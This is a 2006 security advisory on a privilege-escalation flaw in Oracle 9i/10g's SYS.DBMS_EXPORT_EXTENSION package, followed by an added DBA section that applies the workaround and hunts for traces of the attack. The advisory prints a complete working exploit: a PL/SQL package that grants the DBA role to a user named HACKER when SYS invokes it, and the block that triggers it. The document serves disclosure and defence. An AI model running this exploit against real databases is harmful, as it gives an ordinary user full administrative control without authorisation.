SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
Details

The following proof-of-concept exploit code (0day) injects a custom PL/SQL function. SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA accepts the schema and name of an index implementation type from its caller and invokes that type's ODCIIndexGetMetadata routine from inside a definer-rights package owned by SYS, so the attacker-supplied function is executed in the SYS context. In the example below the injected function grants the DBA role to the user HACKER. The exploit works on Oracle 9i Release 2 and also on Oracle 10g Express Edition (XE).

Workarounds

Revoke the EXECUTE privilege on the package from PUBLIC:

REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;

The package DBMS_EXPORT_EXTENSION is needed for creating export files. After revoking the PUBLIC grant, grant EXECUTE on DBMS_EXPORT_EXTENSION directly to the user that performs exports (e.g. SYSTEM).

Example

-- Step 1: create a package in the attacker's schema whose ODCIIndexGetMetadata
-- function carries the payload. When DBMS_EXPORT_EXTENSION calls it, the
-- function is executed as user SYS.
CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,
                                 P3 VARCHAR2,
                                 p4 VARCHAR2,
                                 env SYS.odcienv)
    RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,
                                 P3 VARCHAR2,
                                 p4 VARCHAR2,
                                 env SYS.odcienv)
    RETURN NUMBER
  IS
    -- autonomous transaction so the DDL can be committed from inside the call
    PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN (1);
  END;
END;
/

-- Step 2: pass the attacker's schema and package name as the "type" to
-- DBMS_EXPORT_EXTENSION, which then invokes MYBADPACKAGE.ODCIIndexGetMetadata.
DECLARE
  INDEX_NAME   VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME    VARCHAR2(200);
  TYPE_SCHEMA  VARCHAR2(200);
  VERSION      VARCHAR2(200);
  NEWBLOCK     PLS_INTEGER;
  GMFLAGS      NUMBER;
  v_Return     VARCHAR2(200);
BEGIN
  INDEX_NAME   := 'A1';
  INDEX_SCHEMA := 'HACKER';
  TYPE_NAME    := 'MYBADPACKAGE';
  TYPE_SCHEMA  := 'HACKER';
  VERSION      := '';
  GMFLAGS      := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
                INDEX_NAME   => INDEX_NAME,
                INDEX_SCHEMA => INDEX_SCHEMA,
                TYPE_NAME    => TYPE_NAME,
                TYPE_SCHEMA  => TYPE_SCHEMA,
                VERSION      => VERSION,
                NEWBLOCK     => NEWBLOCK,
                GMFLAGS      => GMFLAGS);
END;
/

Patch Information

Apply Oracle CPU July 2006. Patches for Oracle XE are currently not available.

History

21-apr-2006 - Initial version
06-may-2006 - Workaround enhanced. Thanks to Kristina Hackert for the hint.
18-july-2006 - Info from Oracle CPU July 2006 added.

© 2006 by Red-Database-Security GmbH - last update 18-july-2006
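The following SQL is an added example and not part of the Red-Database-Security advisory. It applies the workaround described above, confirms from the data dictionary that PUBLIC can no longer execute the package, and lists the places a DBA would look for traces of this technique: program units outside SYS that implement ODCIIndexGetMetadata, and current grantees of the DBA role. It assumes a session with DBA privileges and that SYSTEM is the account that runs exports; the dictionary views used (DBA_TAB_PRIVS, DBA_SOURCE, DBA_ROLE_PRIVS) are standard Oracle views.

```sql
-- Added example (not from the original advisory). Run as a DBA.

-- 1. Workaround: drop the PUBLIC grant and re-grant only to the export account.
--    SYSTEM is an assumption; substitute the account that actually runs exp.
REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;
GRANT EXECUTE ON SYS.DBMS_EXPORT_EXTENSION TO SYSTEM;

-- 2. Verify: remaining grantees on the package. No PUBLIC row should appear.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION'
 ORDER BY grantee;

-- 3. Hunt for the technique: program units outside SYS whose source defines
--    ODCIIndexGetMetadata. Legitimate hits normally belong to option schemas
--    (e.g. CTXSYS for Oracle Text); anything owned by an ordinary user schema
--    deserves a closer look, as in the MYBADPACKAGE example above.
SELECT DISTINCT owner, name, type
  FROM dba_source
 WHERE owner <> 'SYS'
   AND UPPER(text) LIKE '%ODCIINDEXGETMETADATA%'
 ORDER BY owner, name;

-- 4. Did a privilege escalation already happen? Review every holder of DBA;
--    on a freshly installed database only the default administrative
--    accounts (SYS, SYSTEM) are expected here.
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;
```

Step 2 is the check to keep after applying the CPU as well: a later grant or a restore from an old export can silently re-introduce the PUBLIC privilege. Step 3 searches source text rather than object names because an attacker can call the package anything; only the function name is dictated by the ODCI interface.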